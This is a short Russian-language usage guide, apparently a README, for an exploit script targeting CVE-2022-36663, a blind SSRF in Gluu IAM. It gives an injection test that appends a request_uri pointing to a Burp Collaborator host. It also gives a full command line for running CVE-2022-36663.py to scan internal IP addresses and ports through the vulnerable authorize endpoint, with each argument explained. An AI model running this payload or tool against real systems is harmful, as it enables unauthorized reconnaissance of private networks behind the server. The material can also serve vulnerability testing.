
Сканер внутренней сети через слепой SSRF в Gluu IAM
Сканер внутренней сети через слепой SSRF в Gluu IAM
Gluu IAM уязвим к слепому SSRF, который можно использовать для сканирования внутренней сети на наличие открытых портов в зависимости от времени ответа.
https://nvd.nist.gov/vuln/detail/CVE-2022-36663
Чтобы проверить, уязвима ли цель, добавьте &request_uri=http://burpcollab к запросу /oxauth/restv1/authorize и отслеживайте входящий трафик от целевого сервера.
python3 CVE-2022-36663.py --url https://target --ip 10.10.10.10 --port 8080 --ar '/oxauth/restv1/authorize?client_id=<clientID>&redirect_uri=https://target.com/return.html&response_type=code&scope=openid+profile+email+user_name&nonce=<nonce>&acr_values=simple_password_auth&request_uri='
Url — URL сервера Gluu IAM
IP — внутренний IP-адрес или подсеть, которую вы хотите сканировать
Port — внутренний порт, который вы хотите сканировать
AR — URL запроса авторизации, заканчивающийся пустым request_uri
